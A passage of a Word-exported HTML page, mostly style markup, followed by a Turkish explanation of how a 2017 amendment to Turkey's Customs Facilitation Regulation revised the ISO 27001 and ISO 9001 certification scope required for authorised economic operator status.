Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style>
<![endif]-->
<br />
<div class="MsoNormal">
<span lang="TR">Gümrük İşlemlerinin Kolaylaştırılması
Yönetmeliği- ISO 27001 Kapsam Değişikliği</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">Bilindiği gibi 21.05.2014
tarihli ve 29006 sayılı Resmi Gazete'de yayımlanan Gümrük İşlemlerinin Kolaylaştırılması
Yönetmeliği ile yetkilendirilmiş yükümlü statüsü için gereken koşullar,
başvuruda aranacak belgeler, sertifikanın verilmesi, süresi, yenilenmesi,
değiştirilmesi, askıya alınması, geri alınması ve iptali ile bu sertifika
kapsamında faydalanılacak izinli gönderici, izinli alıcı, ithalatta yerinde
gümrükleme, onaylanmış ihracatçı, eksik beyan, kısmi teminat, götürü teminat
uygulamaları, beyanın kontrolüne yönelik kolaylaştırmalar, emniyet ve güvenlik
yönlü kolaylaştırmalar ile bu uygulama ve kolaylaştırmalardan faydalanma
yetkilerinin askıya alınması, geri alınması ve iptali ile gümrük mevzuatından
kaynaklanan diğer basitleştirilmiş uygulamalara ilişkin usul ve esaslar
belirlenmiştir. Bu kapsamda firmaların yetkilendirilmiş yükümlü statüsü sahibi
olabilmesi adına hazırlık sürecindeki ön şart olarak tanımlanan şartlardan biri
de ISO 27001 Bilgi Güvenliği Yönetim Sistemi ve ISO 9001 Kalite Yönetim Sistemi
belgesi sahibi olmak olarak tanımlanmıştır. Yönetim sistemlerinin firmanın
minimumda hangi kapsamda uygulaması gerektiği konusu da yönetmelikte
tanımlanmaktadır.<span style="mso-spacerun: yes;"> </span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">13.09.2017 tarihli ve 30209
sayılı Resmi Gazete’de yayımlanan Gümrük İşlemlerinin Kolaylaştırılması
Yönetmeliğinde Değişiklik Yapılmasına Dair Yönetmeliği ile ISO 27001 Bilgi
Güvenliği Yönetim Sistemi ve ISO 9001 Kalite Yönetim Sistemi belgesi için
yönetmelikte tanımlanan kapsam revize edilmiştir. </span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">21.05.2014 tarihli ve 29006
sayılı Resmi Gazete Gümrük İşlemlerinin Kolaylaştırılması Yönetmeliğinde
tanımlanan ISO 27001 ve ISO 9001 kapsamı şu şekilde tanımlanmakta idi;</span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">(3) Birinci fıkranın (e)
bendinde sayılan;</span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">a) ISO 9001 sertifikası,
başvuru sahibinin dış ticaret, gümrükleme, yönetim ve idari organizasyon
faaliyetleri ile bu faaliyetlerle ilişkili işlemlerini ve bunlara bağlı üretim
ve hizmet sunumlarını,</span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">b) ISO 27001 sertifikası;
ithalat, ihracat, transit, gümrükleme gibi gümrük ve dış ticaret işlemlerini ve
bu işlemlere ilişkin lojistik, depolama, muhasebe, finans ve bilgi işlem gibi
faaliyetlerinin elektronik bilgi varlıkları ile bu varlıkları korumak amacıyla
kullandığı bilişim güvenliğini kapsamalıdır.</span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">13.09.2017 tarihli ve 30209
sayılı Resmi Gazete Gümrük İşlemlerinin Kolaylaştırılması Yönetmeliğinde Değişiklik
Yapılmasına Dair Yönetmelikte tanımlanan ISO 27001 ve ISO 9001 kapsamı şu
şekilde revize edilmiştir;</span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">MADDE 9 – Aynı Yönetmeliğin
10 uncu maddesinin üçüncü fıkrası aşağıdaki şekilde değiştirilmiştir. “(3)
Birinci fıkranın (e) bendinde sayılan;</span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">a) ISO 9001 sertifikası,
başvuru sahibinin gümrük, dış ticaret, üretim, lojistik, yönetim ve idari
organizasyon faaliyetlerini,</span></i></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;"><span lang="TR" style="font-size: 9.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">b) ISO 27001 sertifikası; gümrük
ve dış ticaret işlemlerini ve bu işlemlerine ilişkin lojistik, depolama,
muhasebe, finans ve bilgi işlem faaliyetlerinin bilgi varlıkları ile bu
